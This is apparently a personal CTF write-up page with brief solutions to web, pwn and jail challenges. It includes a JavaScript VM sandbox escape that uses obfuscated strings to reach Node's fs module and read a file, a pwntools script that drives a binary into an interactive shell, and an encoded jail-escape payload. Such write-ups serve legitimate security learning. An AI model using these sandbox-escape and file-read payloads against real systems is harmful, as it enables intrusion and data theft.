• https://ctftime.org/event/2673
• March 21 - March 23

My Solves/Writeups

Web

Pwn

Jail

Writeups

web/virtual-mayhem

This application uses a virtual machine to sandbox user templates and filters potentially harmful input. However, every lock has its key. Can you figure out how to escape the virtual machine and retrieve the flag?

host5.metaproblems.com:7585

(This challenge was written by MetaCTF. The flag format is MetaCTF{})

Attachments: virtual_mayhem.zip

Solution

Final exploit:

({}).constructor.constructor("return glo"+"bal['pr'+'ocess']['main'+'Module']['req'+'uire']('f'+'s').readFileSync('flag.txt','utf8')")()

Flag: i forgor

web/upload-issues

This site lets you look at cpio archives. If only we had an admin account, we could look at the flag…

web-upload-issues.ctf.ritsec.club

(This challenge was written by ICR.)

Attachments: upload_issues.zip

Solution

Flag: RS{b34m_m3_up_5c0tty}

pwn/bit-burger

Welcome to BitBurger, home of the world-famous Bit Burger! 🍔

Put in an order here: nc binex-bitburger.ctf.ritsec.club 32200

Only grilled or fried at the moment though, the other machines are broken, sorry!

(This challenge was written by MetaCTF.)

Attachments: bit_burger.zip

Solution

The idea for this challenge was simple, being just

Final Exploit:

from pwn import *

s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe.path] + argv, *a, **kw)


def find_ip(payload):
    p = process([exe.path], level='warn')
    p.sendlineafter(b'>', payload)
    p.wait()
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4))
    warn('located EIP/RIP offset at ' + ip_offset)
    return ip_offset

gdbscript = '''
init-pwndbg
b *0x0000000000401601
continue
'''.format(**locals())

exe = ELF("./bit_burger.bin_patched")
elf = context.binary = exe
context.log_level = 'debug'

# Start Exploit

offset = 0

io = start()

bits_to_set_for_exec = [1,3,5,7,9,10,13,23]
#bits_to_set_for_exec = [2, 12, 15, 16, 18, 19, 20, 23, 24]
for i in range(1, 25):
    if i in bits_to_set_for_exec:
        sla(b'?', b'y')
    else:
        sla(b'?', b'n')

sla(b':', b'a')
itr()

Flag: pTCNp5p6LP0d7qA77yvb4SHf40

pwn/hashmatch

This server is asking me to reverse a hash for a flag, but brute forcing MD5 sounds tedious. Maybe there’s something more… fun we can do to find the flag.

nc hashmatch.ctf.ritsec.club 30898

When you connect, type your input and it will be handled by the challenge.

(This challenge was written by ICR.)

Attachments: hashmatch.zip

Solution

Note: Solved after the CTF ended.

Flag: nuclei

jail/shrimple

As shrimple as that :p

nc shrimple.ctf.ritsec.club 32195

Attachments: shrimple.py

Solution

After cleaning up many uneeded parentheses, I was eventually able to reach the 210 character limit.

Final exploit:

"((-~([]<[])<<-~-~-~-~([]<[]))--~-~([]<[])<<(-~(-~([]<[])<<-~-~-~-~([]<[]))--~-~([]<[])))-(-~-~-~-~([]<[]))**-~-~-~-~-~-~([]<[])+(-~-~([]<[])<<(-~-~-~-~-~-~([]<[])))+((-~([]<[]))<<-~-~-~-~-~([]<[]))--~-~([]<[])"

Then, after forming the image with CyberChef, throwing into georgeom.net/StegOnline/ and browsing bit planes showed the flag. Flag: RS{n0t_s0_sHr1Mp13_any_m0r3_:3}

jail/seti

Come join our search for alien life

nc seti.ctf.ritsec.club 31793

Attachments: seti.zip

Solution

i forgor